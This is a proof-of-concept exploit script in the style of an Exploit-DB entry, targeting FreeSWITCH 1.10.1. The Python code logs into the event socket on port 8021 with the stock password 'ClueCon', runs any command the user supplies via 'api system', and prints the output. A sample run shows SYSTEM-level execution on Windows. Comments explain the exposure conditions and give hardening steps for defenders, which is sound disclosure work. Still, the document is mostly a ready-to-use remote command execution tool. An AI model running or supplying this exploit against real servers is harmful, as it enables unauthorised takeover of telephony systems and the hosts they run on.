# Exploit Title: FreeSWITCH 1.10.1 - Command Execution
# Date: 2019-12-19
# Exploit Author: 1F98D
# Vendor Homepage: https://freeswitch.com/
# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
# Version: 1.10.1
# Tested on: Windows 10 (x64)
#
# FreeSWITCH listens on port 8021 (the event socket) by default and will accept and
# run commands sent to it after authenticating. By default commands are not accepted
# from remote hosts.
#
# Exposure therefore needs two conditions together: the event socket has been opened
# to remote hosts, and the default password is still in place. Both settings live in
# event_socket.conf.xml (`listen-ip`, `apply-inbound-acl`, `password`).
#
# -- Example --
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
# Authenticated
# Content-Type: api/response
# Content-Length: 20
#
# nt authority\system
#

#!/usr/bin/python3
from socket import *
import sys
# Proof-of-concept client for the FreeSWITCH event socket (TCP 8021): it logs in
# with the stock password and asks the server to run one command via `api system`.
#
# What this shows a defender: an event socket that is reachable from the network
# and still uses the default password gives command execution as the account the
# FreeSWITCH service runs under. Hardening is done in event_socket.conf.xml: set a
# unique `password`, keep `listen-ip` on loopback, and restrict clients with
# `apply-inbound-acl`. Connections to port 8021 from non-loopback addresses are
# worth alerting on.
if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)

ADDRESS = sys.argv[1]
CMD = sys.argv[2]
PASSWORD = 'ClueCon'  # default password for FreeSWITCH

esl_sock = socket(AF_INET, SOCK_STREAM)
esl_sock.connect((ADDRESS, 8021))

# The server speaks first; continue only if its greeting asks for authentication.
banner = esl_sock.recv(1024)
if b'auth/request' not in banner:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)

auth_line = 'auth {}\n\n'.format(PASSWORD)
esl_sock.send(auth_line.encode('utf8'))

auth_reply = esl_sock.recv(1024)
if b'+OK accepted' not in auth_reply:
    # The server did not accept the stock password.
    print('Authentication failed')
    sys.exit(1)

print('Authenticated')

# CMD is forwarded verbatim; the server, not this script, executes it.
api_line = 'api system {}\n\n'.format(CMD)
esl_sock.send(api_line.encode('utf8'))

# A single recv() is issued, so a reply larger than the buffer or split across
# TCP segments is printed only in part.
output = esl_sock.recv(8096).decode()
print(output)